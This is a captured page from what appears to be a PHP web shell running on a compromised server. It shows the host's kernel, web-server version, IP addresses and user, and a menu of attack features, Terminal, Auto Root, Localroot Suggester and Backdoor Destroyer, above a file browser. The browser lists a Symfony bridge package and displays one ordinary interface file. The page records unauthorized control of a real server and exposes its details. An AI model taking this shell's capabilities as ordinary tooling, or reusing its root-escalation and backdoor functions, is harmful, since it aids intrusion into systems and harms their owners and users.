Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.117.249.37
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
symfony /
psr-http-message-bridge /
Delete
Unzip
Name
Size
Permission
Date
Action
Factory
[ DIR ]
drwxr-xr-x
2018-08-30 09:00
Tests
[ DIR ]
drwxr-xr-x
2018-08-30 09:00
.gitignore
34
B
-rw-r--r--
2018-08-30 09:00
.travis.yml
2.66
KB
-rw-r--r--
2018-08-30 09:00
CHANGELOG.md
294
B
-rw-r--r--
2018-08-30 09:00
HttpFoundationFactoryInterface.php
1.06
KB
-rw-r--r--
2018-08-30 09:00
HttpMessageFactoryInterface.php
1.06
KB
-rw-r--r--
2018-08-30 09:00
LICENSE
1.04
KB
-rw-r--r--
2018-08-30 09:00
README.md
255
B
-rw-r--r--
2018-08-30 09:00
composer.json
1.12
KB
-rw-r--r--
2018-08-30 09:00
phpunit.xml.dist
881
B
-rw-r--r--
2018-08-30 09:00
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Bridge\PsrHttpMessage; use Psr\Http\Message\ServerRequestInterface; use Psr\Http\Message\ResponseInterface; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\Response; /** * Creates PSR HTTP Request and Response instances from Symfony ones. * * @author Kévin Dunglas <dunglas@gmail.com> */ interface HttpMessageFactoryInterface { /** * Creates a PSR-7 Request instance from a Symfony one. * * @param Request $symfonyRequest * * @return ServerRequestInterface */ public function createRequest(Request $symfonyRequest); /** * Creates a PSR-7 Response instance from a Symfony one. * * @param Response $symfonyResponse * * @return ResponseInterface */ public function createResponse(Response $symfonyResponse); }